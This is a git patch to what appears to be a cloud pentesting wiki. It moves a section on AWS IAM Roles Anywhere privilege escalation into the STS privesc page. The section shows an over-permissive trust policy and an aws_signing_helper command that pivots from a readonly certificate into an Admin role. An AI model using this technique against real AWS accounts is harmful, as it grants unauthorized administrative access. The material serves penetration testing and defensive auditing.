From 278e22cf25c6cf00a35b4a11b2bafb4e9933312c Mon Sep 17 00:00:00 2001 From: carlospolop Date: Tue, 24 Jun 2025 15:59:59 +0200 Subject: [PATCH] UPDATE --- .../aws-iam-roles-anywhere-privesc.md | 50 ------------------- .../aws-sts-privesc.md | 44 ++++++++++++++++ 2 files changed, 44 insertions(+), 50 deletions(-) delete mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md deleted file mode 100644 index 3180d09a4..000000000 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md +++ /dev/null @@ -1,50 +0,0 @@ -# AWS - IAM Roles Anywhere Privesc - -{{#include ../../../../banners/hacktricks-training.md}} - -AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation. - -This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role. - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Service": "rolesanywhere.amazonaws.com" - }, - "Action": [ - "sts:AssumeRole", - "sts:SetSourceIdentity", - "sts:TagSession" - ] - } - ] -} - -``` - -To privesc, the `aws_signing_helper` is required from https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html - -Then using a valid certificate the attacker can pivot into the higher privilege role - -```bash -aws_signing_helper credential-process \ - --certificate readonly.pem \ - --private-key readonly.key \ - --trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \ - --profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \ - --role-arn arn:aws:iam::123456789012:role/Admin -``` - - -### References - -- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/ - -{{#include ../../../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md index 55736918c..b602cfeea 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md @@ -119,6 +119,50 @@ aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ ../aws-basic-information/aws-federation-abuse.md {{#endref}} +### IAM Roles Anywhere Privesc + +AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation. + +This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role. + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "Service": "rolesanywhere.amazonaws.com" + }, + "Action": [ + "sts:AssumeRole", + "sts:SetSourceIdentity", + "sts:TagSession" + ] + } + ] +} + +``` + +To privesc, the `aws_signing_helper` is required from https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html + +Then using a valid certificate the attacker can pivot into the higher privilege role + +```bash +aws_signing_helper credential-process \ + --certificate readonly.pem \ + --private-key readonly.key \ + --trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \ + --profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \ + --role-arn arn:aws:iam::123456789012:role/Admin +``` + + +### References + +- [https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation](https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation) + {{#include ../../../banners/hacktricks-training.md}}